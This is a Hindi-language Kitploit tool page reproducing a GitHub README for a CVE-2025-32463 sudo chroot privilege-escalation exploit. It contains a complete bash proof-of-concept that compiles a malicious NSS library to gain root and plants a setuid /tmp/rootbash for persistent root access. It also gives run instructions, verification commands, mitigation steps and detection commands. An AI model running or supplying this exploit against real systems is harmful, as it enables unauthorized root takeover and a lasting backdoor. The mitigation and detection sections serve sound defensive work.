Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32463 — CVE-2025-32463 के लिए स्थानीय विशेषाधिकार वृद्धि शोषण, sudo chroot डिज़ाइन दोष को लक्षित करता है। प्रभावित sudo संस्करणों 1.9.14-1.9.17 के लिए PoC स्क्रिप्ट, तकनीकी विश्लेषण और शमन मार्गदर्शन प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/kaiht-ladiant/cve-2025-32463
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाबाइनरी शोषण
GitHubkaiht-ladiant/cve-2025-32463

CVE-2025-32463

CVE-2025-32463 के लिए स्थानीय विशेषाधिकार वृद्धि शोषण, sudo chroot डिज़ाइन दोष को लक्षित करता है। प्रभावित sudo संस्करणों 1.9.14-1.9.17 के लिए PoC स्क्रिप्ट, तकनीकी विश्लेषण और शमन मार्गदर्शन प्रदान करता है।

रिपॉजिटरी देखें
271 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-32463 - सुडो क्रोट विशेषाधिकार वृद्धि शोषण

अवलोकन

CVE-2025-32463 सुडो संस्करण 1.9.14 से 1.9.17 में एक गंभीर स्थानीय विशेषाधिकार वृद्धि भेद्यता है। यह भेद्यता सुडो विशेषाधिकार वाले हमलावरों को chroot विकल्प प्रसंस्करण तर्क में एक डिज़ाइन दोष का शोषण करके रूट एक्सेस तक बढ़ने की अनुमति देती है।

भेद्यता विवरण

  • CVE ID: CVE-2025-32463
  • प्रभावित संस्करण: sudo 1.9.14 - 1.9.17
  • भेद्यता प्रकार: स्थानीय विशेषाधिकार वृद्धि (LPE)
  • गंभीरता: गंभीर
  • पैच किया गया संस्करण: sudo 1.9.17p1 और बाद के

तकनीकी विवरण

भेद्यता सुडो की सुरक्षा सत्यापन प्रक्रिया में समय की समस्या के कारण उत्पन्न होती है। pivot_root फ़ंक्शन को सुरक्षा नीति सत्यापन से पहले निष्पादित किया जाता है, जिससे हमलावर फ़ाइल सिस्टम वातावरण में हेरफेर कर सकते हैं जिसका उपयोग सुडो प्रमाणीकरण और प्राधिकरण के लिए करता है।

हमला प्रवाह

  1. वातावरण हेरफेर: हमलावर दुर्भावनापूर्ण nsswitch.conf के साथ एक नियंत्रित chroot वातावरण बनाता है
  2. लाइब्रेरी इंजेक्शन: दुर्भावनापूर्ण NSS (नेम सर्विस स्विच) लाइब्रेरी नियंत्रित वातावरण में रखी जाती है
  3. विशेषाधिकार वृद्धि: sudo रूट विशेषाधिकारों के साथ दुर्भावनापूर्ण लाइब्रेरी लोड और निष्पादित करता है
  4. रूट एक्सेस: हमलावर पूर्ण रूट शेल एक्सेस प्राप्त करता है

प्रभावित फ़ंक्शन

  • pivot_root: प्रक्रिया में बहुत जल्दी निष्पादित किया गया
  • set_cmnd_path: हेरफेर किए गए वातावरण में संचालित होता है
  • command_matches: वातावरण हेरफेर के कारण सुरक्षा जांच को दरकिनार कर दिया गया

आवश्यक शर्तें

इस शोषण का उपयोग करने से पहले, सुनिश्चित करें कि निम्नलिखित शर्तें पूरी हों:

  • लक्ष्य प्रणाली sudo संस्करण 1.9.14 - 1.9.17 चलाती है
  • वर्तमान उपयोगकर्ता के पास sudo विशेषाधिकार हैं
  • sudoers कॉन्फ़िगरेशन chroot संचालन की अनुमति देता है
  • लक्ष्य प्रणाली पर gcc कंपाइलर उपलब्ध है
  • अस्थायी निर्देशिकाओं (जैसे /tmp) में लिखने की पहुंच

उपयोग

त्वरित प्रारंभ

  1. इस रिपॉजिटरी को क्लोन करें:
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
  1. स्क्रिप्ट को निष्पादन योग्य बनाएं:
chmod +x cve-2025-32463.sh
  1. शोषण चलाएं:
./cve-2025-32463.sh

मैन्युअल सत्यापन

जांचें कि लक्ष्य प्रणाली कमजोर है या नहीं:

# sudo संस्करण जांचें
sudo --version

# sudo विशेषाधिकार जांचें
sudo -l

# chroot-संबंधित अनुमतियाँ देखें
sudo -l | grep chroot

शोषण कोड

मुख्य शोषण स्क्रिप्ट (cve-2025-32463.sh):

#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit

STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>

void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  system("id > /tmp/pwned_proof.txt");
  system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
  execl("/bin/bash", "/bin/bash", NULL);
}
CEOF

mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c

echo "[*] CVE-2025-32463 का शोषण किया जा रहा है..."
echo "[*] विशेषाधिकार वृद्धि का प्रयास किया जा रहा है..."
sudo -R pentest pentest

# सफाई
rm -rf ${STAGE?}

सत्यापन

सफल शोषण के बाद, रूट एक्सेस सत्यापित करें:

# वर्तमान विशेषाधिकार जांचें
whoami

# प्रूफ फ़ाइल जांचें
cat /tmp/pwned_proof.txt

# सतत रूट एक्सेस के लिए setuid bash का उपयोग करें
/tmp/rootbash -p

शमन

तत्काल कार्रवाई

  1. sudo को अपडेट करें संस्करण 1.9.17p1 या बाद के:

    # Ubuntu/Debian
    sudo apt update && sudo apt upgrade sudo
    
    # CentOS/RHEL
    sudo yum update sudo
    
    # or
    sudo dnf update sudo
    
  2. sudoers से chroot निर्देश हटाएं (अस्थायी समाधान):

    # वर्तमान कॉन्फ़िगरेशन का बैकअप लें
    sudo cp /etc/sudoers /etc/sudoers.backup
    
    # chroot-संबंधित प्रविष्टियाँ हटाएं
    sudo sed -i '/chroot/d' /etc/sudoers
    
    # सिंटेक्स सत्यापित करें
    sudo visudo -c
    

पता लगाना

शोषण प्रयासों की निगरानी करें:

# संदिग्ध अस्थायी निर्देशिकाएँ जांचें
find /tmp -name "*.stage.*" -type d

# sudo लॉग की निगरानी करें
tail -f /var/log/auth.log | grep sudo

# NSS लाइब्रेरी संकलन देखें
find /tmp -name "libnss_*.so*" -type f

तकनीकी विवरण

मूल कारण विश्लेषण

भेद्यता sudo के निष्पादन प्रवाह में एक डिज़ाइन दोष से उत्पन्न होती है:

  1. सामान्य अपेक्षित प्रवाह:

    • उपयोगकर्ता इनपुट पार्स करें
    • sudoers नीति सत्यापित करें
    • वातावरण सेट करें (chroot सहित)
    • कमांड निष्पादित करें
  2. वास्तविक कमजोर प्रवाह:

    • उपयोगकर्ता इनपुट पार्स करें
    • chroot (pivot_root) निष्पादित करें - यहाँ समस्या उत्पन्न होती है
    • sudoers नीति सत्यापित करें (हेरफेर किए गए वातावरण में)
    • कमांड निष्पादित करें

NSS लाइब्रेरी शोषण

शोषण नेम सर्विस स्विच (NSS) सिस्टम का लाभ उठाता है:

  1. sudo उपयोगकर्ता प्रमाणीकरण के लिए /etc/nsswitch.conf पढ़ता है
  2. chroot वातावरण में, हमलावर इस फ़ाइल को नियंत्रित करता है
  3. दुर्भावनापूर्ण NSS लाइब्रेरी रूट विशेषाधिकारों के साथ लोड की जाती है
  4. लाइब्रेरी कंस्ट्रक्टर रूट के रूप में मनमाना कोड निष्पादित करता है

परीक्षण वातावरण

इस शोषण का परीक्षण निम्न पर किया गया है:

  • Ubuntu 20.04/22.04 सुडो 1.9.15 के साथ
  • Debian 11/12 सुडो 1.9.14-1.9.17 के साथ
  • CentOS 8/9 प्रभावित सुडो संस्करणों के साथ
  • कमजोर सुडो इंस्टॉलेशन वाले Docker कंटेनर

संदर्भ

  • आधिकारिक sudo सुरक्षा सलाह
  • Rich Mirch द्वारा मूल शोध
  • sudo स्रोत कोड विश्लेषण

अस्वीकरण

⚠️ महत्वपूर्ण अस्वीकरण ⚠️

यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

  • केवल उन प्रणालियों पर उपयोग करें जिनके आप मालिक हैं या परीक्षण करने की स्पष्ट अनुमति है
  • इस शोषण का अनधिकृत उपयोग अवैध और अनैतिक है
  • लेखक किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं
  • सुरक्षा परीक्षण करने से पहले हमेशा सुनिश्चित करें कि आपके पास उचित प्राधिकरण है

योगदान

योगदान का स्वागत है! कृपया:

  1. रिपॉजिटरी को फोर्क करें
  2. एक सुविधा शाखा बनाएं
  3. विस्तृत विवरण के साथ पुल रिक्वेस्ट सबमिट करें

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

परिवर्तन लॉग

v1.0.0

  • प्रारंभिक रिलीज़
  • बुनियादी शोषण कार्यक्षमता
  • व्यापक दस्तावेज़ीकरण

नोट: यह भेद्यता एक महत्वपूर्ण सिस्टम घटक को प्रभावित करती है। कृपया जिम्मेदारी से उपयोग करें और सुनिश्चित करें कि सभी परीक्षण अधिकृत हैं।

टूल डाउनलोड करें